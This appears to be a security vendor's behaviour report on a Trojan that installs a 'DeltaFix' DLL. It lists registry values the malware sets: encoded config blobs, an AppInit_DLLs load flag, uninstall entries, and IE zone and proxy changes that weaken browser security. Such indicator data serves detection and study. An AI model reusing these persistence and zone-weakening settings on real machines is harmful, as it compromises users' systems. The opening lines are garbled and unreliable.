"NP6yu5 pNrKTFbcdefEjL8Z1TlnENCpBpb" = "NP6yu5 j4afWvjlhabCRFUrMY6XH7"
"NP6yu5 xh2uW4Hwysu7Ssr8oWZx2xW2hDd4djxqbX" = "NP6yu5 zbMgbIcdefAUN"
"NP6yu5 zUPS3jlhabcQDMNIScd6AO3aDxmTq1WIaX6" = "NP6yu5 tQ3dtOHwysu7dAPo9rWzs6Cz73val5GwlYqnEmAXyKRiEzz 0sbZtS5"
"NP6yu5 s/N9q2LFHwy5Ge3vWafDDyM0XgIXL/SocfUpBEc2iz" = "NP6yu5 xKYF 812345Z1"
"NP6yu5 xyxzUr xztv8XRDd4dOlw/ 0eLrMM" = "NP6yu5 p/RcQikg012CPtvY0JqomLb"
"NP6yu5 kq14RlhabcdIjFSyg16YzyLsH" = "NP6yu5 yJSqVjbcdefTNR8h0D9emAILDaou1CDRdu71j"

The process putfu.exe:1320 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"0dc3ee96" = "/P////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{24c54e38}]
"QuietUninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\DeltaFix\DeltaFix.dll,_uninstall /un /uq"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"uuid" = "6517130317843606773"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"Mode" = "4026531840"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"38583bc3" = "Ml/2/CF/M//g/CZ////%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"LRTS" = "0"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"d1abcdb6" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"8b9e4cbc" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"Mode" = "4026531840"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"c24899a6" = "Vx/g/CD/Mx////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_b0250ce0\eae10f9d]
"dbaf3ce3" = "/P////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"8b9e4cbc" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{24c54e38}]
"InstallDate" = "20131128"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"e46c271e" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"fe94ce1e" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"a0743acc" = "N/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"data.1" = "YOMhbhA8RGRiWVRJLFptyEJs1Gf4N6BYhfYnDcv2ltQlpHbknGfnwTljzpVZDqbXQO8DMDT RcE6c0p3bSmCCONT1F3InY0H QUVFjqUB9h4RcMU t9rL4"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"72758a5d" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"48bd1aff" = "V/////%%"

[HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}]
"n" = "1"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"dlpath" = "c:\progra~1\deltafix\deltafix.dll"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"fe94ce1e" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs" = "1"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"7367429f" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"3c09c42b" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"7f69fa1f" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"0e93c3f3" = "///%"
"f6ad6fa6" = "V/////%%"
"bbf88800" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"c6c5dd44" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"a2e3b941" = "///%"
"a0743acc" = "N/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"a1dcff5b" = "V/////%%"
"65114b36" = "Vl/l////"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"c99a5f5c" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{24c54e38}]
"UninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\DeltaFix\DeltaFix.dll,_uninstall /un"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"f6ad6fa6" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"2e22d94e" = "///%"

"e46c271e" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{24c54e38}]
"DisplayName" = "SystemProlonger"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"7367429f" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\00000000]
"370856c7" = ""

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"3c09c42b" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"State" = "0"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"72758a5d" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"0e93c3f3" = "///%"
"2e22d94e" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"27ddcf6f" = "///%"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D9 96 44 42 0D 40 CC 7C 25 20 0C 12 44 58 0E 33"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\00000000]
"370856c7" = ""

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"0c230bcb" = "///%"
"7f69fa1f" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"f0bf0bde" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"iiid" = "1"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"6185d035" = "Vx/2/Cx/V//l////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"c5705860" = "Vx////%%"

[HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}]
"24c54e38" = "%Program Files%\DeltaFix\DeltaFix.dll"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"Install_Dir" = "%Program Files%\DeltaFix"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"f0bf0bde" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"6185d035" = "Vx/2/Cx/V//l////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"iiid" = "1"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"d1abcdb6" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{24c54e38}]
"Publisher" = "SystemProlonger"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"48bd1aff" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"svpath" = "c:\Program Files\DeltaFix\DeltaFix.dll"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"51d2f2ea" = "JlA3/YV/c/Au/Xh/J/Af/X6/a/Ak/X2/GlAu/YZ////%"
"414bc593" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{24c54e38}]
"CategoryName" = ""

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"a2e3b941" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"data.0" = "PXvWSXHtfR8 7BUMOQqsl hhLoeuGPx2fdj01Vlkvs2qkLh1IsVqbGscfR9kRc53e0wDGqo1K/UCnpZvlywrmN7717cr569vPR"
"data.1" = "YOMhbhA8RGRiWVRJLFptyEJs1Gf4N6BYhfYnDcv2ltQlpHbknGfnwTljzpVZDqbXQO8DMDT RcE6c0p3bSmCCONT1F3InY0H QUVFjqUB9h4RcMU t9rL4"
"LRTS" = "0"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"1520c6f1" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"587b5709" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"587b5709" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"c24899a6" = "Vx/g/CD/Mx////%%"
"51d2f2ea" = "JlA3/YV/c/Au/Xh/J/Af/X6/a/Ak/X2/GlAu/YZ////%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\00000000]
"3efeb33e" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{24c54e38}]
"NoModify" = "1"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"date" = "1417183200"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"340d3099" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{24c54e38}]
"NoRepair" = "1"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_b0250ce0\eae10f9d]
"340d3099" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"a1dcff5b" = "V/////%%"
"1520c6f1" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"usr.1" = "IUvWSecdefABCDWYSU"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"date" = "1417183200"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"data.0" = "PXvWSXHtfR8 7BUMOQqsl hhLoeuGPx2fdj01Vlkvs2qkLh1IsVqbGscfR9kRc53e0wDGqo1K/UCnpZvlywrmN7717cr569vPR"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"340d3099" = "/P////%%"

"bbf88800" = "///%"
"0c230bcb" = "///%"
"414bc593" = "///%"
"27ddcf6f" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"2d71d5ab" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\00000000]
"3efeb33e" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"38583bc3" = "Ml/2/CF/M//g/CZ////%"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"0dc3ee96" = "/P////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"65114b36" = "Vl/l////"

[HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}]
"n" = "1"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"c99a5f5c" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"Version" = "22022115"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"c6c5dd44" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"uuid" = "6517130317843606773"
"svi" = "0"
"svn" = "DeltaFix"
"usr.0" = "T1pZV/tvqomjlhabcd"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"dbaf3ce3" = "/P////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"c5705860" = "Vx////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"svx" = ""

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"usr.0" = "T1pZV/tvqomjlhabcd"
"usr.1" = "IUvWSecdefABCDWYSU"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"2d71d5ab" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"svt" = "1417171946"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process rundll32.exe:1676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5E C4 99 67 0F 80 B7 83 85 6B 84 5D FB F5 CF B1"

The process rundll32.exe:512 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"0e93c3f3" = "///%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38]
"iiid" = "1"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"65114b36" = "Vl/l////"
"414bc593" = "///%"
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"f6ad6fa6" = "V/////%%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"a1dcff5b" = "V/////%%"
"fe94ce1e" = "V/////%%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"
"370856c7" = ""

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"c5705860" = "Vx////%%"
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"8b9e4cbc" = "V/////%%"
"2d71d5ab" = "V/////%%"
"7367429f" = "///%"
"37b7a6d8" = "UlAr/XJ/c//k////"
"0dc3ee96" = "/P////%%"
"e46c271e" = "///%"
